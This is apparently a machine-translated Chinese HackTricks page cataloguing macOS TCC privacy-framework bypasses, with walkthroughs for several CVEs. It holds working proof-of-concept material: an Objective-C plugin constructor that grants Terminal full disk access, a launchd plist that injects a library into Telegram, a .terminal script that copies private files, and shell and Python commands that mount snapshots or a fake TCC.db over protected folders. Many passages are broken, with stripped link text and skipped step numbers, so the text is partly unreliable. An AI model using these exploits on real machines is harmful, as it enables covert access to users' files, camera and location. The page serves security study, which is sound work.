**Music有一个有趣的功能:当它运行时,它会将拖放到~/Music/Music/Media.localized/Automatically Add to Music.localized的文件导入到用户的“媒体库”中。此外,它调用类似于:rename(a, b);**其中a和b为:

  • a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"

  • b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3

这个**rename(a, b);行为容易受到竞争条件的影响,因为可以在Automatically Add to Music.localized文件夹中放入一个伪造的TCC.db文件,然后当创建新文件夹(b)时,复制文件,删除它,并将其指向~/Library/Application Support/com.apple.TCC**/。

SQLITE_SQLLOG_DIR - CVE-2023-32422

SQLITE_AUTO_TRACE

如果设置了环境变量**SQLITE_AUTO_TRACE,库libsqlite3.dylib将开始记录**所有SQL查询。许多应用程序使用这个库,因此可以记录它们所有的SQLite查询。

几个苹果应用程序使用这个库来访问TCC受保护的信息。

# Set this env variable everywhere
launchctl setenv SQLITE_AUTO_TRACE 1

MTL_DUMP_PIPELINES_TO_JSON_FILE - CVE-2023-32407

这个环境变量被Metal框架使用,它是各种程序的依赖,尤其是Music,它具有FDA。

设置以下内容:MTL_DUMP_PIPELINES_TO_JSON_FILE="路径/名称"。如果路径是一个有效的目录,该漏洞将被触发,我们可以使用fs_usage查看程序中发生了什么:

  • 一个文件将被open(),名为路径/.dat.nosyncXXXX.XXXXXX(X是随机的)

  • 一个或多个write()将内容写入文件(我们无法控制此过程)

  • 路径/.dat.nosyncXXXX.XXXXXX将被rename()为路径/名称

这是一个临时文件写入,接着是一个不安全的rename(old, new)。

这是不安全的,因为它必须分别解析旧路径和新路径,这可能需要一些时间,并且容易受到竞争条件的影响。欲了解更多信息,您可以查看xnu函数renameat_internal()。

因此,基本上,如果一个特权进程正在从您控制的文件夹重命名,您可能会获得RCE并使其访问不同的文件,或者像在此CVE中那样,打开特权应用程序创建的文件并存储FD。

如果重命名访问您控制的文件夹,同时您已修改了源文件或拥有FD,您可以更改目标文件(或文件夹)以指向符号链接,这样您可以随时写入。

这是CVE中的攻击示例:例如,要覆盖用户的TCC.db,我们可以:

  • 创建/Users/hacker/ourlink指向/Users/hacker/Library/Application Support/com.apple.TCC/

  • 创建目录/Users/hacker/tmp/

  • 设置MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db

  • 通过使用此环境变量运行Music来触发漏洞

  • 捕获/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX(X是随机的)的open()

  • 在这里,我们还为写入打开此文件,并保留文件描述符

  • 在一个循环中原子地切换/Users/hacker/tmp和/Users/hacker/ourlink

  • 我们这样做是为了最大化成功的机会,因为竞争窗口非常狭窄,但是输掉比赛的风险微乎其微

  • 等待一会儿

  • 测试我们是否幸运

  • 如果没有,从头再来

现在,如果尝试使用环境变量MTL_DUMP_PIPELINES_TO_JSON_FILE,应用程序将无法启动

Apple Remote Desktop

作为root,您可以启用此服务,ARD代理将具有完全磁盘访问权限,用户可以滥用这一点,使其复制新的TCC用户数据库。

通过NFSHomeDirectory

TCC在用户的HOME文件夹中使用数据库来控制用户特定资源的访问,位于**$HOME/Library/Application Support/com.apple.TCC/TCC.db**。 因此,如果用户设法使用指向不同文件夹的$HOME环境变量重新启动TCC,用户可以在**/Library/Application Support/com.apple.TCC/TCC.db**中创建一个新的TCC数据库,并欺骗TCC授予任何应用程序任何TCC权限。

请注意,Apple使用存储在用户配置文件中的设置来作为**NFSHomeDirectory属性的值,因此,如果您入侵了具有修改此值权限的应用程序(kTCCServiceSystemPolicySysAdminFiles),您可以使用TCC绕过武器化**此选项。

CVE-2021-30970 - Powerdir

  1. 为目标应用程序获取_csreq_ blob。

  2. 放置一个带有所需访问权限和_csreq_ blob的虚假_TCC.db_文件。

  4. 修改目录服务条目以更改用户的主目录。

  6. 停止用户的_tccd_并重新启动该进程。

第二个POC使用了**/usr/libexec/configd,其中具有值为kTCCServiceSystemPolicySysAdminFiles的com.apple.private.tcc.allow权限。 通过使用-t选项运行configd,攻击者可以指定要加载的自定义Bundle**。因此,该漏洞替换了使用**configd代码注入更改用户主目录的dsexport和dsimport**方法。

通过进程注入

有不同的技术可以注入代码到进程中并滥用其TCC权限:

此外,发现的绕过TCC最常见的进程注入是通过插件(加载库)。 插件通常以库或plist的形式存在,将由主应用程序加载并在其上下文中执行。因此,如果主应用程序具有对TCC受限文件的访问权限(通过授予的权限或权限),自定义代码也将具有该权限。

CVE-2020-27937 - Directory Utility

应用程序/System/Library/CoreServices/Applications/Directory Utility.app具有权限**kTCCServiceSystemPolicySysAdminFiles,加载带有.daplug扩展名的插件,并且没有启用强化**运行时。

为了武器化此CVE,NFSHomeDirectory被更改(滥用先前的权限),以便能够接管用户的TCC数据库以绕过TCC。

CVE-2020-29621 - Coreaudiod

二进制文件 /usr/sbin/coreaudiod 具有权限 com.apple.security.cs.disable-library-validation 和 com.apple.private.tcc.manager。第一个权限允许进行代码注入,第二个权限允许其访问管理 TCC。

该二进制文件允许从文件夹 /Library/Audio/Plug-Ins/HAL 加载第三方插件。因此,可以使用以下 PoC 加载插件并滥用 TCC 权限:

#import <Foundation/Foundation.h>
#import <Security/Security.h>

extern void TCCAccessSetForBundleIdAndCodeRequirement(CFStringRef TCCAccessCheckType, CFStringRef bundleID, CFDataRef requirement, CFBooleanRef giveAccess);

void add_tcc_entry() {
CFStringRef TCCAccessCheckType = CFSTR("kTCCServiceSystemPolicyAllFiles");

CFStringRef bundleID = CFSTR("com.apple.Terminal");
CFStringRef pureReq = CFSTR("identifier \"com.apple.Terminal\" and anchor apple");
SecRequirementRef requirement = NULL;
SecRequirementCreateWithString(pureReq, kSecCSDefaultFlags, &requirement);
CFDataRef requirementData = NULL;
SecRequirementCopyData(requirement, kSecCSDefaultFlags, &requirementData);

TCCAccessSetForBundleIdAndCodeRequirement(TCCAccessCheckType, bundleID, requirementData, kCFBooleanTrue);
}

__attribute__((constructor)) static void constructor(int argc, const char **argv) {

add_tcc_entry();

NSLog(@"[+] Exploitation finished...");
exit(0);

设备抽象层(DAL)插件

通过核心媒体I/O(具有**kTCCServiceCamera的应用程序)打开摄像头流的系统应用程序会在/Library/CoreMediaIO/Plug-Ins/DAL中加载这些插件**(不受SIP限制)。

只需在那里存储一个具有常见构造函数的库即可用于注入代码。

几个苹果应用程序存在此漏洞。

Firefox

Firefox应用程序具有com.apple.security.cs.disable-library-validation和com.apple.security.cs.allow-dyld-environment-variables权限:

codesign -d --entitlements :- /Applications/Firefox.app
Executable=/Applications/Firefox.app/Contents/MacOS/firefox

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key>
<true/>
<key>com.apple.security.cs.disable-library-validation</key>
<true/>
<key>com.apple.security.cs.allow-dyld-environment-variables</key><true/>
<true/>
<key>com.apple.security.device.audio-input</key>
<true/>
<key>com.apple.security.device.camera</key>
<true/>
<key>com.apple.security.personal-information.location</key>
<true/>
<key>com.apple.security.smartcard</key>
<true/>
</dict>
</plist>

CVE-2020-10006

二进制文件 /system/Library/Filesystems/acfs.fs/Contents/bin/xsanctl 具有权限 com.apple.private.tcc.allow 和 com.apple.security.get-task-allow,这允许注入代码到进程中并使用 TCC 权限。

CVE-2023-26818 - 电报

请注意如何使用环境变量加载库,创建了一个自定义 plist 来注入此库,并使用 launchctl 来启动它:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.telegram.launcher</string>
<key>RunAtLoad</key>
<true/>
<key>EnvironmentVariables</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/tmp/telegram.dylib</string>
</dict>
<key>ProgramArguments</key>
<array>
<string>/Applications/Telegram.app/Contents/MacOS/Telegram</string>
</array>
<key>StandardOutPath</key>
<string>/tmp/telegram.log</string>
<key>StandardErrorPath</key>
<string>/tmp/telegram.log</string>
</dict>
</plist>
launchctl load com.telegram.launcher.plist

通过打开调用

即使在受沙盒限制的情况下,也可以调用**open**

终端脚本

在技术人员使用的计算机上,通常会为终端授予完全磁盘访问权限(FDA),并且可以使用它来调用**.terminal**脚本。

.terminal 脚本是类似于以下具有要在**CommandString**键中执行的命令的属性列表文件:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
<dict>
<key>CommandString</key>
<string>cp ~/Desktop/private.txt /tmp/;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>

一个应用程序可以在诸如 /tmp 这样的位置编写一个终端脚本,并使用如下命令启动它:

// Write plist in /tmp/tcc.terminal
[...]
NSTask *task = [[NSTask alloc] init];
NSString * exploit_location = @"/tmp/tcc.terminal";
task.launchPath = @"/usr/bin/open";
task.arguments = @[@"-a", @"/System/Applications/Utilities/Terminal.app",
exploit_location]; task.standardOutput = pipe;
[task launch];

通过挂载

CVE-2020-9771 - mount_apfs TCC绕过和提权

任何用户(甚至是非特权用户)都可以创建和挂载一个时间机器快照,并访问该快照的所有文件。 唯一需要的特权是用于应用程序(如Terminal)具有完全磁盘访问(FDA)权限(kTCCServiceSystemPolicyAllfiles),需要由管理员授予。

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

CVE-2021-1784 & CVE-2021-30808 - 在TCC文件上挂载

即使TCC DB文件受到保护,也可以在目录上挂载一个新的TCC.db文件:

# CVE-2021-1784
## Mount over Library/Application\ Support/com.apple.TCC
hdiutil attach -owners off -mountpoint Library/Application\ Support/com.apple.TCC test.dmg

# CVE-2021-1784
## Mount over ~/Library
hdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg
# This was the python function to create the dmg
def create_dmg():
os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
os.system("mkdir /tmp/mnt")
os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")

asr

工具**/usr/sbin/asr**允许复制整个磁盘并在另一个位置挂载,绕过了TCC保护。

位置服务

在**/var/db/locationd/clients.plist中有第三个TCC数据库,用于指示允许访问位置服务的客户端。 文件夹/var/db/locationd/没有受到DMG挂载的保护**,因此可以挂载我们自己的plist。

通过启动应用程序

通过grep

在许多情况下,文件会在非受保护的位置存储敏感信息,如电子邮件、电话号码、消息...(这被视为苹果的一个漏洞)。

合成点击

参考

有关从该授权中获取 icloud 令牌的漏洞的更多信息,请查看演讲:

根据,由于 TCC 守护程序是通过 launchd 在当前用户域中运行的,可以控制传递给它的所有环境变量。 因此,攻击者可以在 launchctl 中设置 $HOME 环境 变量指向一个受控 目录,重新启动 TCC 守护程序,然后直接修改 TCC 数据库,以获取所有可用的 TCC 权限,而无需提示最终用户。 PoC:

如果**SQLITE_SQLLOG_DIR="path/folder"基本上意味着任何打开的数据库都会被复制到该路径**。在这个CVE中,这个控制被滥用,以便在将要由具有FDA TCC数据库的进程打开的SQLite数据库中写入,然后滥用**SQLITE_SQLLOG_DIR与文件名中的符号链接**,因此当该数据库被打开时,用户的TCC.db被覆盖为已打开的数据库。 更多信息和。

更多信息请参阅

第一个POC使用和来修改用户的HOME文件夹。

使用导出用户的目录服务条目。

使用导入修改后的目录服务条目。

有关更多信息,请查看。

有关更多信息,请查看。

有关更多信息,请查阅。

电报具有权限 com.apple.security.cs.allow-dyld-environment-variables 和 com.apple.security.cs.disable-library-validation,因此可以滥用它来获取其权限,例如使用摄像头录制。您可以在。

更详细的解释可以在。

查看中的完整利用。

这种方法不再有效,但在过去:

另一种方法是使用:

🍏
htARTE(HackTricks AWS Red Team Expert)
订阅计划
官方PEASS & HackTricks周边产品
PEASS家族
NFT收藏品
Discord群
电报群
@carlospolopm
HackTricks
HackTricks Cloud
TCC-ClickJacking
macOS Privilege Escalation
https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/
#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula
macOS Apple Scripts
这篇 Stack Exchange 帖子
在写作中
在讲座中
https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html
dsexport
dsimport
dsexport
dsimport
原始报告
macOS Process Abuse
原始报告
原始报告
写作中找到有效载荷
原始报告中找到
原始报告
macOS Auto Start
曾经有效
CoreGraphics事件
https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8
https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/
20+ Ways to Bypass Your macOS Privacy Mechanisms
Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms
CVE-2020–9934 - TCC
CVE-2020-27937 - Directory Utility
https://github.com/breakpointHQ/TCC-ClickJacking/raw/main/resources/clickjacking.jpg